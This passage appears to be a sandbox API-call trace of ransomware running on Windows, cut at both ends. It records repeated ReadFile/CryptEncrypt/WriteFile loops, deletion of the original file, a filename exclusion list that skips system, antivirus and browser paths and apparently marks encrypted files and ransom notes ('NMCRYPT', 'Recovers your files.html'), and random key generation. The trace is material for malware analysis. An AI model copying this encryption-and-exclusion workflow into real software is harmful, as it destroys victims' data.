pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.177] GetLastError () returned 0x0 [0170.177] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.177] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.177] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.177] GetLastError () returned 0x0 [0170.177] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.177] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.177] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.177] GetLastError () returned 0x0 [0170.177] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.177] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.177] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.177] GetLastError () returned 0x0 [0170.177] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.177] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.177] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.178] GetLastError () returned 0x0 [0170.178] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.178] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.178] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.178] GetLastError () returned 0x0 [0170.178] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.178] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.178] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.178] GetLastError () returned 0x0 [0170.178] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.178] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.178] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.178] GetLastError () returned 0x0 [0170.178] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.178] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.178] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.178] GetLastError () returned 0x0 [0170.178] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.178] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.178] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.178] GetLastError () returned 0x0 [0170.178] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.178] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.179] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.179] GetLastError () returned 0x0 [0170.179] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.179] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.179] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.179] GetLastError () returned 0x0 [0170.179] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.179] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.179] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.179] GetLastError () returned 0x0 [0170.179] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.179] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.179] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.179] GetLastError () returned 0x0 [0170.179] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.179] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.179] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.179] GetLastError () returned 0x0 [0170.179] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.179] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.179] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.179] GetLastError () returned 0x0 [0170.180] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.180] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.180] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.180] GetLastError () returned 0x0 [0170.180] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.180] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.180] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.180] GetLastError () returned 0x0 [0170.180] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.180] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.180] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.180] GetLastError () returned 0x0 [0170.180] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.180] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.180] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.180] GetLastError () returned 0x0 [0170.180] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.180] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.180] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0170.180] GetLastError () returned 0x0 [0170.180] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0170.180] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0170.180] WriteFile (in: hFile=0x15c4, lpBuffer=0x2893368*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0170.181] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui")) returned 0x20 [0170.181] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui", dwFileAttributes=0x20) returned 0 [0170.181] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned 1 [0170.181] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui")) returned 0 [0170.181] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" [0170.181] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US") returned 1 [0170.181] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\.xXC6E.tmp" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\.xxc6e.tmp")) returned 0xc6e [0170.183] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\.xXC6E.tmp" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\.xxc6e.tmp"), dwFlags=0x1) returned 0 [0170.183] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\.xXC6E.tmp" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\.xxc6e.tmp")) returned 1 [0170.183] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0170.183] wcslen (_String="OK") returned 0x2 [0170.183] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0170.184] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0170.184] CryptDestroyKey (hKey=0x9ad138) returned 1 [0170.184] CryptDestroyHash (hHash=0x9ad478) returned 1 [0170.184] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0170.184] FindNextFileW (in: hFindFile=0x9ad8b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0170.184] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*NMCRYPT") returned 0 [0170.184] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*Recovers your files.html") returned 0 [0170.184] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*.exe") returned 0 [0170.184] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*.dll") returned 0 [0170.184] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*.lnk") returned 0 [0170.184] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*.bat") returned 0 [0170.184] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*.ini") returned 0 [0170.184] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*.msi") returned 0 [0170.184] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*.scf") returned 0 [0170.184] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*pagefile.sys*") returned 0 [0170.184] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0170.184] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*AppData*") returned 0 [0170.184] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*\\winrar\\*") returned 0 [0170.184] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0170.184] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*\\java\\*") returned 0 [0170.184] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0170.184] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*\\windows\\*") returned 0 [0170.184] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*\\ESET\\*") returned 0 [0170.184] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*\\AVG\\*") returned 0 [0170.184] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0170.184] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0170.184] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*Atheros*") returned 0 [0170.184] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*Realtek*") returned 0 [0170.184] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*bootmgr*") returned 0 [0170.185] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*boot*") returned 0 [0170.185] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*boot*") returned 0 [0170.185] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0170.185] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*IO.SYS*") returned 0 [0170.185] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0170.185] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0170.185] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*ntldr*") returned 0 [0170.185] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*chrome*") returned 0 [0170.185] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*opera*") returned 0 [0170.185] PathMatchSpecW (pszFile="sqlxmlx.rll.mui", pszSpec="*firefox*") returned 0 [0170.185] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui", pszSpec="*") returned 1 [0170.185] strlen (_Str="NMoreira") returned 0x8 [0170.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.185] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.186] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: 